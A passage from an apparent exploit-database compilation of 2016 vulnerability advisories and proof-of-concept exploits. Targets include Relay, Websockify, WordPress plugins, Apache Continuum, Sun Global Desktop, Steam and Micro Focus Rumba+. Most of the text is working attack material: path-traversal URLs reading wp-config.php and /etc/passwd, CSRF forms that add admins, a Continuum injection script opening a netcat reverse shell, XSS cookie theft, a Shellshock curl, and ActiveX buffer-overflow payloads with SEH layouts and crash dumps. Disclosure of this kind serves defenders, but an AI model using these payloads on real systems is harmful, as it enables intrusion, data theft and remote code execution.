http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
the server's output of the phpinfo() function.
Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server e.g. in order to easily execute PHP
commands with the privileges of the web server.
Workaround
==========
One possible workaround would be to prevent the execution of files in
the upload directory and deliver them as attachments instead.
Fix
===
None.
Security Risk
=============
This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.
Timeline
========
2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published
References
==========
[1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
[2] https://code.google.com/p/relay/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Advisory: Websockify: Remote Code Execution via Buffer Overflow
RedTeam Pentesting discovered a buffer overflow vulnerability in the C
implementation of Websockify, which allows attackers to execute
arbitrary code.
Details
=======
Product: Websockify C implementation
Affected Versions: all versions <= 0.8.0
Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]
Vulnerability Type: Buffer Overflow
Security Risk: high
Vendor URL: https://github.com/kanaka/websockify
Vendor Status: fixed
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-004
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
"websockify was formerly named wsproxy and was part of the noVNC
project.
At the most basic level, websockify just translates WebSockets traffic
to normal TCP socket traffic. Websockify accepts the WebSockets
handshake, parses it, and then begins forwarding traffic between the
client and the target in both directions."
(from the project's readme)
More Details
============
For each new connection, websockify forks and calls the function
do_handshake() to receive a client's WebSocket handshake. The
following excerpt shows some of the source code responsible for
receiving the client's data from the socket file descriptor:
------------------------------------------------------------------------
ws_ctx_t *do_handshake(int sock) {
char handshake[4096], response[4096], sha1[29], trailer[17];
[...]
offset = 0;
for (i = 0; i < 10; i++) {
len = ws_recv(ws_ctx, handshake+offset, 4096);
if (len == 0) {
handler_emsg("Client closed during handshake\n");
return NULL;
}
offset += len;
handshake[offset] = 0;
if (strstr(handshake, "\r\n\r\n")) {
break;
}
usleep(10);
}
[...]
------------------------------------------------------------------------
As can be seen in the listing, the function ws_recv() is called in a
loop to read data from the client's socket into the stack-allocated
buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096
bytes are read from the socket and stored in the handshake buffer.
The variable 'offset' determines the position in the buffer at which
the received data is written. In each iteration, the value of 'offset'
is increased by the amount of bytes received. If the received data
contains the string "\r\n\r\n", which marks the end of the WebSocket
handshake data, the loop is terminated. Otherwise, the loop is
terminated after a maximum of 10 iterations. The do_handshake()
function returns early if no more data can be received from the
socket.
By forcing websockify to iterate multiple times, attackers can
exploit this behaviour to write data past the space allocated for the
handshake buffer, thereby corrupting adjacent memory.
Proof of Concept
================
The following curl command can be used to trigger the buffer overflow:
$ curl http://example.com/$(python -c 'print "A"*5000')
Providing a generic exploit for this vulnerability is not feasible, as
it depends on the server side environment websockify is used in as well
as the used compiler and its flags. However, during a penetration test
it was possible to successfully exploit this buffer overflow
vulnerability and to execute arbitrary commands on the server.
Workaround
==========
Use the Python implementation of websockify.
Fix
===
The vulnerability has been fixed in commit 192ec6f [0].
Security Risk
=============
Successful exploitation of the vulnerability allows attackers to execute
arbitrary code on the affected system. It is therefore rated as a high
risk.
Timeline
========
2016-04-14 Vulnerability identified
2016-05-03 Advisory provided to customer
2016-05-06 Customer provided updated firmware, notified users
2016-05-23 Customer notified users again
2016-05-31 Advisory published
References
==========
[0] https://github.com/kanaka/websockify/commit/192ec6f5f9bf9c80a089ca020d05ad4bd9e7bcd9
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
####################
# Meta information #
####################
# Exploit Title: Wordpress plugin simple-backup - Multiple vulnerabilities
# Date: 2016-06-02
# Exploit Author: PizzaHatHacker [A] gmail [.] com
# Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/
# Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.11
# Tested on: simple-backup 2.7.11 & Wordpress 4.4.2
#
# History :
# 2016-02-21 Contact requested on the vendor website via "Contact Us"
# 2016-02-24 Contact requested on the vendor website via "Support"
# 2016-03-09 Email to plugins@wordpress.org
# 2016-03-10 Acknowledged by Wordpress team
# 2016-06-02 No information, no response, vulnerabilities not fixed,
# disclosure of this document.
#
##################################
### 1. Arbitrary File Deletion ###
##################################
It is possible to remotely delete arbitrary files on the webserver on wordpress
blogs that have simple-backup plugin installed and enabled. No authentication
is required, the default configuration of simple-backup is affected.
Example 1 : Delete "pizza.txt" in wordpress root :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt
Example 2 : Delete .htaccess file protecting the backup folder :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting
Note : When 'download_backup_file' parameter is provided with an invalid
filepath, the PHP script exits prematurely with message "Access Denied!" and so
does not regenerate automaticaly the .htaccess file.
After this request, it may be possible (depending on the web server
configuration) to browse the backup directory and download server backup files
at this URL :
http://127.0.0.1/<WP-path>/simple-backup/
The backup archive files may contain all the wordpress files : configuration
files (wp-config.php etc.), PHP source code (plugins, etc.), and a database
dump (all tables content, wordpress users passwords etc.).
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
########################
### 2. File Download ###
########################
It is possible to download remote files from the webserver on wordpress blogs
that have simple-backup plugin installed and enabled. No authentication is
required, the default configuration of simple-backup is affected.
Example 1 : Download tools.php source file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=
Example 2 : Download a backup file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar
(If backups are performed automatically at predefined times, it is easy to
find the backup file name, as it is based on the current time).
Moreover, the checks performed on user-provided 'filename' parameter are
insufficient :
simple-backup-manager.php:function download_local_backup_file($filename){
$filename = ltrim($filename, ".\/");
* Only logged-in AND authorized users (with permissions to manage backups)
should be allowed to download files
* The file name should match a backup file and must not be empty
* The input is not correctly checked for directory traversal (use PHP
'basename' instead of 'ltrim')
For example in the special case where a folder 'oldBackups' is created inside
the backup directory, it would be possible to download ANY file on the web
server via direct requests to this kind of URLs :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS Base Score : 5
Impact Subscore : 2.9
Exploitability Subscore : 10
<!--
# Exploit Title: Dream Gallery - CSRF Add Admin Exploit
# Google Dork: "Design by Rafael Clares"
# Date: 2016/06/03
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://phpstaff.com.br/
# Version: 1.0
#Exploit:
-->
<html>
<body>
<form method="post" action="http://localhost/{PACH}/admin/usuario.php?action=incluir">
<input type="hidden" name="user_login" value="ali">
<input type="hidden" name="user_password" type="hidden" value="123456" >
<input type="hidden" name="user_email" value="">
<input type="submit" value="create">
</form>
</body>
</html>
<!--
#########################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
# Exploit Title: Unauthenticated command injection - Apache Continuum
# Google Dork: inurl::8080/continuum/
# Date: 04/06/2016
# Exploit Author: David Shanahan (@cyberpunksec)
# Contact: http://www.procheckup.com/
# Vendor Homepage: https://continuum.apache.org/
# Software Link: https://continuum.apache.org/download.cgi
# Version: 1.4.2
# Tested on: Debian
--- Description ---
Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/
ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS.
1) Command injection
Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action
Vulnerable Parameter - installation.varValue
#!/bin/sh
if [ $# -eq 0 ]
then
echo "$0 <rhost> <rport> <lhost> <lport>"
echo "Remember to set up your netcat listener"
exit 1
fi
cmd="\`nc $3 $4 -e /bin/sh\`"
echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]"
echo "\t\t[ Procheckup - David Shanahan ]\n"
curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd"
2) Reflected XSS
The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL.
If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel<http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest%3cscript%3ealert(document.cookie)%3c/script%3e&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel>
Fix:
The Apache Continuum project is no longer maintained. Removal of the software is recommended.
http://www.procheckup.com/
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.
# Exploit Title: Valve Steam 3.42.16.13 Local Privilege Escalation
# CVE-ID: CVE-2016-5237
# Date: 5/11/52016
# Exploit Author: gsX
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.valvesoftware.com/
# Software Link: http://store.steampowered.com/about/
#Version: File Version 3.42.16.13, Built: Apr 29 2016, Steam API: v017, Steam package versions: 1461972496
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The Steam directory located at C:\Program Files (x86)\Steam implement weak
file permissions
and allow anyone in the BUILTIN\Users windows group to modify any file in
the Steam directory and any of its child files and folders.
Since Steam is a startup application by default this makes it particularly
easy to achieve lateral/vertical privilege escalation and achieve code
execution against any user running the application.
2. Proof
C:\Program Files (x86)>icacls Steam
Steam BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
3. Exploit:
Simply backdoor/replace Steam.exe or any other related exe's/dll's with
the code you want to
run.
I would like to note that I contacted Valve on several occasions
and gave them plenty of time to reply/fix the issue before releasing this
entry.
# Exploit Title: Online examination system 1.0 - SQL Injection
# Google Dork: inurl:showtest.php?subid=
# Date: 2016/06/05
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://www.onlinefreeprojectdownload.com
# Sofware Link :
http://www.onlinefreeprojectdownload.com/download.php?name=projects/php%20projects/Online_exam.zip
# Version: 1.0
#Exploit:
http://localhost/{PATH}/showtest.php?subid=[SQL Injection]
#Admin Panel:
http://localhost/{PATH}/admin
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00
#Desc:
When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.
#Exploit:
-->
<html>
<body>
<form method="post" action="
http://localhost/{PACH}/admin/adminsettings.php">
<input type="hidden" name="update" value="1">
<input type="hidden" name="pass1" type="hidden" value="12345678" >
<input type="hidden" name="pass2" type="hidden" value="12345678" >
<input type="submit" value="create">
</form>
</body>
</html>
<!--
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .
I have wrote a Complete POC post:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to:
[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
and it will get saved in directory:
/wp-content/plugins/wp-mobile-detector/cache/shell.php
Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities
Vendor: Micro Focus
Product web page: https://www.microfocus.com
Affected version: 9.4.4058.0 and 9.4.0 SP0 Patch0
Affected products/tools : Rumba Desktop 9.4
Rumba 9.4 Trace
Rumba 9.4 APPC Configuration
Rumba 9.4 AS400 Communications
Rumba 9.4 AS400 File Transfer
Rumba 9.4 Communication Monitor
Rumba 9.4 Engine
Rumba 9.4 Screen Designer
Rumba 9.4 Submit Remote Command ;]
Rumba FTP Client 4.5
Summary: Rumba is a terminal emulation solution with UI (User Interface)
modernization properties. Rumba and Rumba+ allows users to connect to
so-called 'legacy systems' (typically a mainframe) via desktop, web and
mobile.
Desc: Rumba+ software package suffers from multiple stack buffer overflow
vulnerabilities when parsing large amount of bytes to several functions in
several OLE controls. An attacker can gain access to the system of the affected
node and execute arbitrary code.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Enterprise SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5327
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5327.php
03.02.2016
--
----------------------------
1. MacroName (WdMacCtl.ocx):
----------------------------
<html>
<object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\SYSTEM\WdMacCtl.OCX"
prototype = "Function PlayMacro ( ByVal MacroName As String ) As Boolean"
memberName = "PlayMacro"
progid = "ObjectXMacro.ObjectXMacro"
argCount = 1
arg1=String(272, "A") + "BBBB" + String(16, "C") + "DDDD" + "EEEE" + String(14700, "C")
' ^ ^ ^ ^ ^ ^
' | | | | | |
'-----------junk---------ds:edx-------padding-------nseh-----seh------------scspace----
' 6224 bytes usable space
target.PlayMacro arg1
</script>
</html>
===
(1d78.52c): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\ntdll.dll -
eax=00000000 ebx=45454545 ecx=74d72a9c edx=42424242 esi=0032ddc0 edi=00000000
eip=770a15fe esp=0032dd58 ebp=0032ddac iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtRaiseException+0x12:
770a15fe 83c404 add esp,4
0:000> !exchain
0032e7cc: 45454545
Invalid exception stack at 44444444
0:000> d 0032e7cc
0032e7cc 44 44 44 44 45 45 45 45-43 43 43 43 43 43 43 43 DDDDEEEECCCCCCCC
0032e7dc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e7ec 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e7fc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e80c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e81c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e82c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0032e83c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0032ddac 77147415 0032ddc0 0032de10 00000000 ntdll!NtRaiseException+0x12
0032e0e0 7711071a 45454545 fffffffe fffffffe ntdll!RtlRemoteCall+0x236
0032e130 770db3f5 45454545 0000004d 0032e82c ntdll!RtlUlonglongByteSwap+0x1327a
0032e1b0 77090133 0032e1c8 0032e218 0032e1c8 ntdll!LdrRemoveLoadAsDataTable+0xcac
0032e7b0 41414141 42424242 43434343 43434343 ntdll!KiUserExceptionDispatcher+0xf
0032e7b4 42424242 43434343 43434343 43434343 0x41414141
0032e7b8 43434343 43434343 43434343 43434343 0x42424242
0032e7bc 43434343 43434343 43434343 44444444 0x43434343
0032e7c0 43434343 43434343 44444444 45454545 0x43434343
0032e7c4 43434343 44444444 45454545 43434343 0x43434343
0032e7c8 44444444 45454545 43434343 43434343 0x43434343
0032e7cc 45454545 43434343 43434343 43434343 0x44444444
0032e7d0 43434343 43434343 43434343 43434343 0x45454545
0032e7d4 43434343 43434343 43434343 43434343 0x43434343
0032e7d8 43434343 43434343 43434343 43434343 0x43434343
0032e7dc 43434343 43434343 43434343 43434343 0x43434343
-----------------------------
2. NetworkName (iconfig.dll):
-----------------------------
<html>
<object classid='clsid:E1E0A940-BE28-11CF-B4A0-0004AC32AD97' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\system\iconfig.dll"
prototype = "Property Let NetworkName As String"
memberName = "NetworkName"
progid = "ObjectXSNAConfig.ObjectXSNAConfig"
argCount = 1
arg1=String(9000000, "B")
target.NetworkName = arg1
</script>
</html>
===
STATUS_STACK_BUFFER_OVERRUN encountered
(2958.3e0): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\MSVCR120.dll -
eax=00000000 ebx=616c4480 ecx=76280484 edx=003ee021 esi=00000000 edi=003ee794
eip=76280265 esp=003ee268 ebp=003ee2e4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
kernel32!GetProfileStringW+0x12cc9:
76280265 cc int 3
..
0:000> d esp+400
003ee668 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee678 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee688 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee698 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6a8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6b8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6c8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
003ee6d8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0:000> u
kernel32!GetProfileStringW+0x12cc9:
76280265 cc int 3
76280266 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh
7628026d e9c574feff jmp kernel32!UnhandledExceptionFilter+0x40 (76267737)
76280272 33c0 xor eax,eax
76280274 40 inc eax
76280275 c3 ret
76280276 8b65e8 mov esp,dword ptr [ebp-18h]
76280279 68090400c0 push 0C0000409h
0:000> dds
003ee6e8 42424242
003ee6ec 42424242
003ee6f0 42424242
003ee6f4 42424242
003ee6f8 42424242
003ee6fc 42424242
003ee700 42424242
003ee704 42424242
003ee708 42424242
003ee70c 42424242
003ee710 42424242
003ee714 42424242
003ee718 42424242
003ee71c 42424242
003ee720 42424242
003ee724 42424242
003ee728 42424242
003ee72c 42424242
003ee730 42424242
003ee734 42424242
003ee738 42424242
003ee73c 42424242
003ee740 1e4cd74b
003ee744 003ec760
003ee748 7594d140 OLEAUT32!DispCallFunc+0xa6
003ee74c 006a191c
003ee750 02f50024
003ee754 006a1a7c
003ee758 001df530
003ee75c 003ee754
003ee760 003ee7f0
003ee764 7594cfba OLEAUT32!VarCmp+0xd35
------------------------
3. CPName (iconfig.dll):
------------------------
<html>
<object classid='clsid:E1E0A940-BE28-11CF-B4A0-0004AC32AD97' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\system\iconfig.dll"
prototype = "Property Let CPName As String"
memberName = "CPName"
progid = "ObjectXSNAConfig.ObjectXSNAConfig"
argCount = 1
arg1=String(8212, "A")
target.CPName = arg1
</script>
</html>
------------------------------
4. PrinterName (ProfEdit.dll):
------------------------------
<html>
<object classid='clsid:09A1C362-676A-11D2-A0BE-0060B0A25144' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll"
prototype = "Property Let PrinterName As String"
memberName = "PrinterName"
progid = "ProfileEditor.PrintPasteControl"
argCount = 1
arg1="http://zeroscience.mk/zslrss.xml"
'or string 10000 bytes
target.PrinterName = arg1
</script>
</html>
===
(23f4.4c2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll -
eax=baadf00d ebx=5fab4b10 ecx=baadf00d edx=003857b8 esi=0030e7b8 edi=0030e66c
eip=5fa63a60 esp=0030e5fc ebp=0030e604 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ProfEdit+0x13a60:
5fa63a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=??
----------------------
5. Data (FtxBIFF.dll):
----------------------
<html>
<object classid='clsid:2E67341B-A697-11D4-A084-0060B0C3E4EC' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll"
prototype = "Function WriteRecords ( ByVal Row As Long , ByVal Col As Long , ByVal DataType As Long , ByVal Data As String ) As Boolean"
memberName = "WriteRecords"
progid = "FTXBIFFLib.AS400FtxBIFF"
argCount = 4
arg1=2
arg2=3
arg3=r
arg4=String(100000, "A")
target.WriteRecords arg1 ,arg2 ,arg3 ,arg4
</script>
</html>
===
(1164.1dd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll -
eax=00000000 ebx=56c0a928 ecx=757bd0c4 edx=fffff000 esi=baadf00d edi=0036eba8
eip=56bf3011 esp=0033ddc8 ebp=0033ddd4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
FtxBIFF+0x3011:
56bf3011 837e2020 cmp dword ptr [esi+20h],20h ds:002b:baadf02d=????????
0:000> d esp
0033ddc8 f0 dd 33 00 0d f0 ad ba-0d f0 ad ba 48 eb 36 00 ..3.........H.6.
0033ddd8 2c 83 bf 56 02 00 00 00-03 00 00 00 00 00 00 00 ,..V............
0033dde8 f0 dd 33 00 40 eb 36 00-41 41 41 41 41 41 41 41 ..3.@.6.AAAAAAAA
0033ddf8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de08 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de18 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de28 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0033de38 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
-----------------------------------
6. Serialized (NMSecComParams.dll):
-----------------------------------
<html>
<object classid='clsid:30A01218-C999-4C40-91AE-D8AE4C884A9B' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll"
prototype = "Property Let Serialized As String"
memberName = "Serialized"
progid = "NMSECCOMPARAMSLib.SSL3"
argCount = 1
arg1=String(1333200, "A")
target.Serialized = arg1
</script>
</html>
===
(1508.1a9c): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll -
eax=00362000 ebx=1003efa0 ecx=001d369c edx=0045e600 esi=0045e8b0 edi=0045e6d4
eip=100366b7 esp=0045e640 ebp=0045e684 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
NMSecComParams!DllUnregisterServer+0x4617:
100366b7 8500 test dword ptr [eax],eax ds:002b:00362000=00000000
---------------------------------
7. UserName (NMSecComParams.dll):
---------------------------------
<html>
<object classid='clsid:3597EAD7-8E7A-4276-AF12-40F8BD515921' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll"
prototype = "Property Let UserName As String"
memberName = "UserName"
progid = "NMSECCOMPARAMSLib.FirewallProxy"
argCount = 1
arg1=String(1026000, "A")
target.UserName = arg1
</script>
</html>
===
(1620.16bc): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll -
eax=000d2000 ebx=1003edd0 ecx=00000000 edx=003e390a esi=001ceba8 edi=001cea5c
eip=100366b7 esp=001ce9e4 ebp=001cea0c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
NMSecComParams!DllUnregisterServer+0x4617:
100366b7 8500 test dword ptr [eax],eax ds:002b:000d2000=00000000
-------------------------
8. LUName (ProfEdit.dll):
-------------------------
<html>
<object classid='clsid:5A01664E-6CF1-11D2-A0C2-0060B0A25144' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll"
prototype = "Property Let LUName As String"
memberName = "LUName"
progid = "ProfileEditor.MFSNAControl"
argCount = 1
arg1=String(14356, "A")
target.LUName = arg1
</script>
</html>
===
(f10.1cb8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll -
